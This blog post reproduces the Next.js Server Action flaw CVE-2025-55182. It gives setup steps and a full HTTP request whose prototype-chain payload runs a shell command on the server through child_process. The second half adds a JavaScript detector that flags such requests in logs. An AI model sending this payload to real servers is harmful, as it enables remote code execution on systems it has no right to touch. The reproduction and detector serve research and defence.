React2Shell CVE-2025-55182 Reproduction
This article describes how to start a Next.js application with the npx and npm commands and gives an example HTTP POST request; the vulnerability mechanism will be analysed in a follow-up. 2025-12-8 03:51:59 Author: www.o2oxy.cn

1. Starting the environment

npx [email protected] my-next-app
npm run dev -- -H 0.0.0.0

Once the dev server is up, access port 3000 on the host IP and send the following request.

POST / HTTP/1.1
Host: 192.168.1.72:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0
Next-Action: x
X-Nextjs-Request-Id: b5dce965
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Length: 701


------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"


{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('whoami').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"


"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"


[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
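From a defender's side, a request of the shape above is what you want to recognise in traffic captures or access logs. The JavaScript below is an added example, not code from the original post or from the Next.js project. It parses a raw HTTP request, records whether the Next-Action header is present, splits the multipart body on its boundary, and flags form-data parts whose Flight-style references ("$<id>:<key>:...") walk into __proto__ or constructor, or that carry the internal _response/_prefix/_chunks/_formData fields seen in the payload above. The function and constant names are my own; the sample requests are constructed from the one on this page, with the _prefix value replaced by a placeholder; the indicator list is a triage heuristic derived from that single payload, not a complete signature, and does not replace upgrading to a fixed release.

```javascript
"use strict";

// Added example (not from the original post or the Next.js project):
// heuristic triage for Server Action requests of the shape shown above.

// Flight-style reference: "$" + chunk id + ":"-separated property path,
// e.g. "$1:__proto__:then". Group 1 captures the ":key:key" path.
const FLIGHT_REF = /\$\d+((?::[A-Za-z0-9_$]+)+)/g;
const PROTOTYPE_KEYS = new Set(["__proto__", "constructor", "prototype"]);
// Internal fields of a Flight response object; a client has no reason to
// send them as action arguments (list taken from the payload on this page).
const INTERNAL_KEYS = ["_response", "_prefix", "_chunks", "_formData"];

function parseRawRequest(raw) {
  const sep = raw.indexOf("\r\n\r\n");
  const head = sep === -1 ? raw : raw.slice(0, sep);
  const body = sep === -1 ? "" : raw.slice(sep + 4);
  const [requestLine, ...headerLines] = head.split("\r\n");
  const headers = {};
  for (const line of headerLines) {
    const i = line.indexOf(":");
    if (i > 0) headers[line.slice(0, i).trim().toLowerCase()] = line.slice(i + 1).trim();
  }
  return { requestLine, headers, body };
}

// Minimal multipart/form-data splitter: returns [{ name, body }] per part.
function parseMultipart(body, boundary) {
  const parts = [];
  for (const chunk of body.split("--" + boundary)) {
    const piece = chunk.replace(/^\r\n/, "");
    if (piece === "" || piece.startsWith("--")) continue; // preamble / closing delimiter
    const sep = piece.indexOf("\r\n\r\n");
    if (sep === -1) continue;
    const name = /name="([^"]*)"/.exec(piece.slice(0, sep));
    parts.push({ name: name ? name[1] : null, body: piece.slice(sep + 4).replace(/\r\n$/, "") });
  }
  return parts;
}

// Collect every "$<id>:..." reference whose path touches a prototype key.
function findPrototypeReferences(text) {
  const hits = [];
  for (const m of text.matchAll(FLIGHT_REF)) {
    if (m[1].slice(1).split(":").some((k) => PROTOTYPE_KEYS.has(k))) hits.push(m[0]);
  }
  return hits;
}

function inspectServerActionRequest(raw) {
  const { headers, body } = parseRawRequest(raw);
  const result = { isServerAction: "next-action" in headers, suspicious: false, findings: [] };
  const boundary = /boundary=("?)([^";]+)\1/.exec(headers["content-type"] || "");
  if (!boundary) return result; // non-multipart body: out of scope for this check
  for (const part of parseMultipart(body, boundary[2])) {
    for (const ref of findPrototypeReferences(part.body)) {
      result.findings.push(`part ${part.name}: reference ${ref} walks into a prototype key`);
    }
    for (const key of INTERNAL_KEYS) {
      if (part.body.includes(`"${key}"`)) result.findings.push(`part ${part.name}: client-supplied internal field "${key}"`);
    }
  }
  result.suspicious = result.findings.length > 0;
  return result;
}

// Constructed samples. The malicious one mirrors the request on this page,
// with the _prefix value replaced by a placeholder string.
function buildRequest(boundary, parts, extraHeaders) {
  const lines = ["POST / HTTP/1.1", "Host: 192.168.1.72:3000", ...extraHeaders,
    `Content-Type: multipart/form-data; boundary=${boundary}`, ""];
  for (const [name, value] of parts) {
    lines.push(`--${boundary}`, `Content-Disposition: form-data; name="${name}"`, "", value);
  }
  lines.push(`--${boundary}--`);
  return lines.join("\r\n");
}
const BOUNDARY = "----WebKitFormBoundaryx8jO2oVc6SWP3Sad";
const MALICIOUS_ARG = JSON.stringify({
  then: "$1:__proto__:then", status: "resolved_model", reason: -1,
  value: JSON.stringify({ then: "$B1337" }),
  _response: { _prefix: "PLACEHOLDER_REMOVED", _chunks: "$Q2",
               _formData: { get: "$1:constructor:constructor" } },
});
const MALICIOUS_REQUEST = buildRequest(BOUNDARY, [["0", MALICIOUS_ARG], ["1", '"$@0"'], ["2", "[]"]], ["Next-Action: x"]);
const BENIGN_REQUEST = buildRequest(BOUNDARY, [["0", '["hello"]']], ["Next-Action: x"]);
const PLAIN_POST = buildRequest(BOUNDARY, [["0", MALICIOUS_ARG]], []); // same payload, no Next-Action header

for (const [label, req] of [["malicious", MALICIOUS_REQUEST], ["benign", BENIGN_REQUEST], ["plain", PLAIN_POST]]) {
  console.log(label, JSON.stringify(inspectServerActionRequest(req)));
}
```

The body indicators are evaluated even when the Next-Action header is absent, so the header only tells you which code path the request targets; a hit in the body is worth logging either way. Being string-based, the check tolerates the double blank lines and odd Content-Length of a hand-crafted capture, which a strict multipart parser might reject before any logging happened.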

The root-cause analysis of the vulnerability will be covered in the next article.


Source: https://www.o2oxy.cn/4460.html